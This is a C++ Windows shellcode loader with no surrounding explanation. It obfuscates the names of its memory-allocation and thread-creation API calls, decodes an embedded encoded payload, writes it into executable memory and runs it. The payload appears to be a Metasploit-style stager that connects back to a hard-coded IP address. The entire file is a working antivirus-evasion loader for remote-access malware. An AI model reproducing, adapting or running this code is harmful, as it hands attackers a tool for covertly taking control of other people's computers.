#include <iostream>
#include <windows.h>

typedef LPVOID(WINAPI* VA)(
    LPVOID lpAddress,
    SIZE_T dwSize,
    DWORD flAllocationType,
    DWORD flProtect
    );

typedef VOID(WINAPI* MVM)(
    VOID UNALIGNED* Destination,
    const VOID UNALIGNED* Source,
    SIZE_T Length
    );

typedef HANDLE(WINAPI* CT)(
    LPSECURITY_ATTRIBUTES lpThreadAttribute,
    SIZE_T dwStackSize,
    LPTHREAD_START_ROUTINE lpStartAddress,
    __drv_aliasesMem LPVOID lpParameter,
    DWORD dwCreationFlag,
    LPDWORD lpThreadID
    );

void cc(char* data, size_t data_len, int offset) {

    int i = 0;

    do {

        data[i] = (int(data[i]) - offset % 255);
        i++;
    } while (i < data_len - 1);
}

int main() {

    void* exec;
    HANDLE thread;
    unsigned int shit_len;

    char eva[] = "\x1b\x2e\x37\x39\x3a\x26\x31\x06\x31\x31\x34\x28";

    char emvm[] = "\x17\x39\x31\x12\x34\x3b\x2a\x12\x2a\x32\x34\x37\x3e";

    char ect[] = "\x08\x37\x2a\x26\x39\x2a\x19\x2d\x37\x2a\x26\x29";

    char ekl32[] = "\x30\x2a\x37\x33\x2a\x31\xf8\xf7";

    cc((char*)eva, sizeof(eva), 197);
    cc((char*)emvm, sizeof(emvm), 197);
    cc((char*)ect, sizeof(ect), 197);
    cc((char*)ekl32, sizeof(ekl32), 197);

    unsigned char shit[] =
        "\x26\x72\xad\x0e\x1a\x12\xf6\x2a\x2a\x2a\x6b\x7b\x6b\x7a\x7c"
        "\x72\x5b\xfc\x7b\x8f\x72\xb5\x7c\x8a\x72\xb5\x7c\x42\x72\xb5"
        "\x7c\x4a\x80\x72\x39\xe1\x74\x74\x72\xb5\x9c\x7a\x77\x5b\xf3"
        "\x72\x5b\xea\xd6\x66\x8b\xa6\x2c\x56\x4a\x6b\xeb\xf3\x37\x6b"
        "\x2b\xeb\x0c\x17\x7c\x72\xb5\x7c\x4a\xb5\x6c\x66\x72\x2b\xfa"
        "\x6b\x7b\x90\xab\xa2\x42\x35\x2c\x39\xaf\x9c\x2a\x2a\x2a\xb5"
        "\xaa\xb2\x2a\x2a\x2a\x72\xaf\xea\x9e\x91\x72\x2b\xfa\x7a\xb5"
        "\x72\x42\x6e\xb5\x6a\x4a\x73\x2b\xfa\x0d\x80\x72\x29\xf3\x6b"
        "\xb5\x5e\xb2\x72\x2b\x00\x77\x5b\xf3\x72\x5b\xea\xd6\x6b\xeb"
        "\xf3\x37\x6b\x2b\xeb\x62\x0a\x9f\x1b\x76\x2d\x76\x4e\x32\x6f"
        "\x63\xfb\x9f\x02\x82\x6e\xb5\x6a\x4e\x73\x2b\xfa\x90\x6b\xb5"
        "\x36\x72\x6e\xb5\x6a\x46\x73\x2b\xfa\x6b\xb5\x2e\xb2\x72\x2b"
        "\xfa\x6b\x82\x6b\x82\x88\x83\x84\x6b\x82\x6b\x83\x6b\x84\x72"
        "\xad\x16\x4a\x6b\x7c\x29\x0a\x82\x6b\x83\x84\x72\xb5\x3c\x13"
        "\x75\x29\x29\x29\x87\x72\x5b\x05\x7d\x73\xe8\xa1\x93\x98\x93"
        "\x98\x8f\x9e\x2a\x6b\x80\x72\xb3\x0b\x73\xf1\xec\x76\xa1\x50"
        "\x31\x29\xff\x7d\x7d\x72\xb3\x0b\x7d\x84\x77\x5b\xea\x77\x5b"
        "\xf3\x7d\x7d\x73\xe4\x64\x80\xa3\xd1\x2a\x2a\x2a\x2a\x29\xff"
        "\x12\x39\x2a\x2a\x2a\x5b\x5a\x58\x5b\x5a\x5a\x58\x5c\x5d\x63"
        "\x58\x5b\x5e\x5d\x2a\x84\x72\xb3\xeb\x73\xf1\xea\x25\x4a\x2a"
        "\x2a\x77\x5b\xf3\x7d\x7d\x94\x2d\x7d\x73\xe4\x81\xb3\xc9\xf0"
        "\x2a\x2a\x2a\x2a\x29\xff\x12\x1a\x2a\x2a\x2a\x59\xa2\x92\x93"
        "\xa3\x80\x9a\x5e\x6d\x9d\x99\x5f\x5f\x89\x72\x94\x57\x71\xa1"
        "\x83\x7a\x94\x6b\x99\x6e\x62\x8d\x5b\x97\x7d\x5f\x8e\x94\x8d"
        "\x76\x61\x9c\x80\x72\x62\xa4\x7d\x79\x75\x94\x89\x5e\x80\x97"
        "\xa0\x82\xa2\x74\x73\x6c\x74\x97\x5c\x7d\xa2\x57\xa0\x77\x99"
        "\x8b\x57\x96\x5d\x9c\x94\x96\x76\x7c\x63\x9d\x7d\x96\x5b\x8e"
        "\x92\x99\x98\x5e\x7d\x72\xa1\x8b\x8b\x6c\x71\x76\x7d\x73\x7b"
        "\x6c\xa0\x91\x9a\x7f\x7c\x7e\x6d\x90\x5d\x82\x9a\x77\x99\x5b"
        "\x94\x97\x73\x94\x6b\x6f\x9c\x79\x91\x92\x6f\x6e\x74\xa1\x6b"
        "\x6c\x63\x9b\x83\x9a\x8c\x7b\x89\x6e\x99\x9e\x97\x6d\x5c\x6c"
        "\x60\x95\x93\x79\x70\x57\x8c\x76\x5f\x62\x9a\x7c\x61\x9b\x5a"
        "\x5d\x93\x90\x9a\x5d\x8b\x5a\x61\x9a\xa2\x78\x9f\xa0\x89\xa1"
        "\x7d\x91\x60\x61\x76\x82\x97\x6c\x81\x92\x8e\x79\x98\x75\x74"
        "\x6d\x82\x89\x6f\x91\x6f\x82\x74\x9f\x8b\x81\x9c\xa4\x75\x90"
        "\x92\x71\x5a\x5a\x95\x75\xa2\x9a\xa3\xa3\x72\x99\x7d\x9d\x5c"
        "\x62\x5e\x6f\x74\xa1\x75\x5b\x89\x77\x6b\x9d\x82\x90\x5b\x74"
        "\x5c\x94\x99\x78\x7d\x7e\x7b\x98\xa1\x76\x2a\x72\xb3\xeb\x7d"
        "\x84\x6b\x82\x77\x5b\xf3\x7d\x72\xe2\x2a\x2c\x52\xae\x2a\x2a"
        "\x2a\x2a\x7a\x7d\x7d\x73\xf1\xec\x15\x7f\x58\x65\x29\xff\x72"
        "\xb3\xf0\x94\x34\x89\x7d\x84\x72\xb3\x1b\x77\x5b\xf3\x77\x5b"
        "\xf3\x7d\x7d\x73\xf1\xec\x57\x30\x42\xa5\x29\xff\xaf\xea\x9f"
        "\x49\x72\xf1\xeb\xb2\x3d\x2a\x2a\x73\xe4\x6e\x1a\x5f\x0a\x2a"
        "\x2a\x2a\x2a\x29\xff\x72\x29\xf9\x9e\x2c\x15\xf6\x12\x7f\x2a"
        "\x2a\x2a\x7d\x83\x94\x6a\x84\x73\xb3\xfb\xeb\x0c\x3a\x73\xf1"
        "\xea\x2a\x3a\x2a\x2a\x73\xe4\x82\xce\x7d\x0f\x2a\x2a\x2a\x2a"
        "\x29\xff\x72\xbd\x7d\x7d\x72\xb3\x11\x72\xb3\x1b\x72\xb3\x04"
        "\x73\xf1\xea\x2a\x4a\x2a\x2a\x73\xb3\x23\x73\xe4\x3c\xc0\xb3"
        "\x0c\x2a\x2a\x2a\x2a\x29\xff\x72\xad\xee\x4a\xaf\xea\x9e\xdc"
        "\x90\xb5\x31\x72\x2b\xed\xaf\xea\x9f\xfc\x82\xed\x82\x94\x2a"
        "\x83\x73\xf1\xec\x1a\xdf\xcc\x80\x29\xff";

    shit_len = sizeof(shit);

    VA vainit = (VA)GetProcAddress(GetModuleHandleA(ekl32), eva);
    exec = vainit(0, shit_len, MEM_COMMIT | MEM_RESERVE, 0x40);

    cc((char*)shit, shit_len, 42);

    MVM mvminit = (MVM)GetProcAddress(GetModuleHandleA(ekl32), emvm);
    mvminit(exec, shit, shit_len);

    CT ctinit = (CT)GetProcAddress(GetModuleHandleA(ekl32), ect);
    thread = ctinit(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);

    WaitForSingleObject(thread, -1);





}

